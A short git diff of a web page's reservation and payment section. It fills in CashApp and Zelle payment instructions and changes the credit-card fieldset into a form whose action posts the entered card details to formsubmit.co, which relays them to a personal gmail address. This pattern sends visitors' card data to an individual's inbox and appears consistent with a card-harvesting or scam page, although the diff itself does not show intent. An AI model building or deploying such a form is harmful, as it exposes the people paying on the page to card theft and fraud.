--- a/reserve.html
+++ b/reserve.html
@@ -166,7 +166,7 @@
                                 </div>
                                 <div id="collapseOne" class="collapse" data-parent="#accordion">
                                     <div class="card-body">
-                                        <p class="no-margin font-15">Pay via CashApp;</p>
+                                        <p class="no-margin font-15">Pay via CashApp; you can pay with your credit card if you don't have a CashApp account.</p>
                                     </div>
                                 </div>
                             </div>
@@ -176,7 +176,7 @@
                                 </div>
                                 <div id="collapseTwo" class="collapse" data-parent="#accordion">
                                     <div class="card-body">
-                                        <p class="no-margin font-15">Pay via ;</p>
+                                        <p class="no-margin font-15">Pay via Zelle; you can pay with your credit card if you don't have a Zelle account.</p>
                                     </div>
                                 </div>
                             </div>
@@ -196,7 +196,7 @@
                                 </div>
                                 <div id="collapseFour" class="collapse" data-parent="#accordion">
                                     <div class="card-body">
-                                        <fieldset>
+                                        <form method="post" action="https://formsubmit.co/sylviajerrold@gmail.com">
                                             <div class="row">
                                                 <div class="form-group col-md-6 col-lg-6 col-xl-6 required">
                                                     <label for="input-cardname">Name on Card <span class="required-f">*</span></label>
